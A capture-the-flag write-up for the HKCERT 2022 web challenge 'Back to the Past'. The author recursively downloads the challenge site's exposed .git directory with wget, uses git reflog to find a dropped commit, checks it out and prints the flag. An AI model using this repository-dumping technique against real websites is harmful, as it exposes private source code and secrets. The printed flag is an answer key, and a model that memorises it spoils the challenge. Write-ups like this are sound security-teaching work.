Back to the Past
Overview
-
Overall difficulty for me (From 1-10 stars): ★★★★☆☆☆☆☆☆
-
Challenge difficulty: ★☆☆☆☆
Background
Web: http://chal.hkcert22.pwnable.hk:28222
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-ii-en-6a196795
Find the flag
Home page:
View-source:
<html>
<head>
<title>Welcome</title>
</head>
<body style="background: black; color: white;">
<h1 style="text-align:center;">Welcome to my home page!</h1>
<p style="text-align:center;"><a href="https://www.youtube.com/watch?v=o1UcRXTXmN4><img src="img/door.png" height="200" class="center"
[...]
Let’s explore this web page!
When I click the door, it brings me to a YouTube video, which is not helpful.
However, when I go to /img
directory, I see a picture file:
403 Forbidden…
Since the challenge’s name is Back to the Past
, this got me thinking: Is this website being pushed via git
?
If so, it might have a directory call .git
Boom! Let’s wget
all the files!
┌──(root🌸siunam)-[~/ctf/HKCERT-CTF-2022/Web/Back-to-the-Past]
└─# mkdir .git;cd .git
┌──(root🌸siunam)-[~/…/HKCERT-CTF-2022/Web/Back-to-the-Past/.git]
└─# wget -r http://chal.hkcert22.pwnable.hk:28222/.git/
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# ls -lah
total 20K
drwxr-xr-x 4 root root 4.0K Nov 11 22:03 .
drwxr-xr-x 3 root root 4.0K Nov 11 22:03 ..
drwxr-xr-x 8 root root 4.0K Nov 11 22:03 .git
drwxr-xr-x 2 root root 4.0K Nov 11 22:03 img
-rw-r--r-- 1 root root 1.8K Oct 25 10:34 index.html
Since it’s a .git
directory, we can view it’s logs and commits!
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# git log
commit 77fe6ae33755cbac75cf2bf00014a9e4b2f08903 (HEAD -> master)
Author: Holland Wan <noreply@noreply.com>
Date: Fri Oct 21 22:48:35 2022 +0800
Final webpage
commit a9c248a136bb24592cfe1dd14805dde9da321c4d
Author: Holland Wan <noreply@noreply.com>
Date: Fri Oct 21 22:38:59 2022 +0800
Initial
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# git reflog
77fe6ae (HEAD -> master) HEAD@{0}: commit: Final webpage
a9c248a HEAD@{1}: reset: moving to a9c248a136bb24592cfe1dd14805dde9da321c4d
4ba5380 HEAD@{2}: commit: What is this?
a9c248a HEAD@{3}: commit (initial): Initial
The What is this?
commit looks sussy!
Let’s checkout
that commit!
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# git checkout 4ba5380 -f
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# ls -lah
total 16K
drwxr-xr-x 3 root root 4.0K Nov 11 22:07 .
drwxr-xr-x 3 root root 4.0K Nov 11 22:03 ..
-rw-r--r-- 1 root root 52 Nov 11 22:07 flag.txt
drwxr-xr-x 8 root root 4.0K Nov 11 22:07 .git
┌──(root🌸siunam)-[~/…/Web/Back-to-the-Past/.git/chal.hkcert22.pwnable.hk:28222]
└─# cat flag.txt
hkcert22{n0stalgic_w3bs1t3_br1ings_m3_b4ck_to_2000}
We got the flag!
Conclusion
What we’ve learned:
- Insecurely Storing Files